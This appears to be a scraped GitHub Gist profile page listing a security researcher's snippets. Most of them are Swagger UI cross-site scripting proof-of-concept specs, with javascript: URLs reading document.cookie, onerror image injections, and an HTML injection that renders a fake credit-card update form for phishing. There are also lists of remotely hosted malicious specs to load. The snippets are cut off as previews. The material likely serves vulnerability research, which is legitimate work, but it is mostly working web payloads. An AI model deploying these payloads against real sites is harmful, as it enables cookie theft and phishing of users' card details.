Skip to content

Instantly share code, notes, and snippets.

View danzajork's full-sized avatar
💻
hacking

Dan danzajork

💻
hacking
View GitHub Profile
@danzajork
danzajork / input.py
Created April 11, 2019 12:42
Provide input to process
import os
import subprocess
values = ['values', 'to', 'write', 'to', 'process']
for i in values:
p = subprocess.Popen('./forbidden.dms', stdin=subprocess.PIPE)
p.communicate(i)
&#060 | less than sign <
&#064 | at sign @
&#093 | right bracket ]
&#123 | left curly brace {
&#125 | right curly brace }
&#133 | ellipsis …
&#135 | double dagger ‡
&#146 | right single quote ’
&#148 | right double quote ”
&#150 | short dash –
@danzajork
danzajork / extract-files.bro
Created November 15, 2018 16:49
bro script to extract all files to disk
##! Extract all files to disk.
@load base/files/extract
event file_new(f: fa_file)
{
Files::add_analyzer(f, Files::ANALYZER_EXTRACT);
}
swagger: "2.0"
info:
title: "Swagger Sample App",
description: "Please to click Terms of service"
termsOfService: "javascript:alert(document.cookie)"
contact:
name: "API Support",
url: "javascript:alert(document.cookie)",
email: "javascript:alert(document.cookie)"
version: "1.0.1"
swagger: '2.0'
securityDefinitions:
a:
type: oauth2
authorizationUrl: javascript:alert(document.domain)//
info:
version: "0.0.1"
title: Example Title
description: Please Authorize! <img src=x onerror=alert(1) />
paths:
{
"swagger": "2.0",
"info": {
"description": " <img src=x onerror=alert(document.domain)><h1>[XSS POC](javascript:alert%28document.domain%29)",
"version": "1.0.0",
"title": "Swagger XSS POC",
"termsOfService": "javascript:alert%28document.domain%29)",
"contact": {
"email": "javascript:alert%28document.domain%29)"
},
urls: [
{
"url": "https://gist.githubusercontent.com/danzajork/196a65886940b1f08eceaf2726e95361/raw/4e1d42baf2068decf2bac94fdea5926a1ea87d17/swagger.json",
"name": "Petstore"
},
{
"url": "https://gist.githubusercontent.com/danzajork/0998810ee062fc9004b4ccf468fa42b0/raw/6efd1d76a3bf9c5957381162b043cce21942048c/swagger-xss-oauth2.yml",
"name": "Petstore2"
},
{
swagger: '2.0'
info:
version: 1.0.0
title: HTML injection PoC
description: '<div class="creditCardForm">
<div class="heading">
<h1>Update your Credit Card</h1>
</div>
<div class="payment">
<form action="https://example.com/" method="post" class="form-signin" id = "login_form">
swagger: '2.0'
securityDefinitions:
a:
type: oauth2
authorizationUrl: javascript:alert(document.domain)//
info:
version: "0.0.1"
title: Example Title
description: Please Authorize!
paths:
urls: [
{
"url": "https://gist.githubusercontent.com/danzajork/f6273f7d00620da3f6f3e3c04ec68002/raw/17546e73f8f52a31f7c8360e5a342812405a23e1/cc.yaml",
"name": "Petstore"
},
{
"url": "https://gist.githubusercontent.com/danzajork/0998810ee062fc9004b4ccf468fa42b0/raw/6efd1d76a3bf9c5957381162b043cce21942048c/swagger-xss-oauth2.yml",
"name": "Petstore2"
},
{